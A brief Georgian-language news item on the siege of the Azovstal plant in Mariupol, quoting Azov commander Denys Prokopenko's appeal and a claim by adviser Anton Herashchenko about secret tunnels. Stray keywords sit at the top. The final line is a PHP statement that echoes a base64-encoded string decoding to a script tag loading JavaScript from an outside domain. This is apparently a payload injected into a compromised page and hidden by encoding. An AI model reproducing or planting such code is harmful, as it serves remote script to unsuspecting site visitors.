celsiusi
ავერსი საქკაბელი
„აზოვის“ პოლკის მეთაური დენის პროკოპენკო საგანგებო მომართავს ავრცელებს და აცხადებს, რომ მდგომარეობა კრიტიკულია და მძიმე ბრძოლები მიმდინარეობს.
 
"მდგომარეობა კრიტიკულია. "აზოვი" დაცვას გმირულად განაგრძობს და სიტუაციას აკონტროლებს. უკვე მეორე დღეა, მტერი ქარხნის ტერიტორიაზე შემოიჭრა, სისხლიანი დაპირისპირება მიმდინარეობს, ამაყი ვარ ჩემი ჯარისკაცებით, რომლებიც ზებუნებრივ ძალისხმევას იჩენენ მტრის შესაკავებლად.
 
მადლობას ვუხდი მთელ მსოფლიოს მარიუპოლის გარნიზონის უზარმაზარი მხარდაჭერისთვის. ჩვენ ვაგრძელებთ თავდაცვას ბოლომდე ვიბრძოლებთ. დიდება უკრაინას!"
 
შინაგან საქმეთა მინისტრის მრჩეველმა, ანტონ გერაშჩენკომ კი განაცხადა, რომ "აზოვსტალის" ყოფილმა თანამშრომელმა, რუს საოკუპაციო ძალებს, ქარხნის ტერიტორიაზე, მიწისქვეშ არსებული საიდუმლო გადასასვლელები აჩვენა. შტურმი ახლა, სწორედ ამ გვირაბებში მიმდინარეობს. 
 
870
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");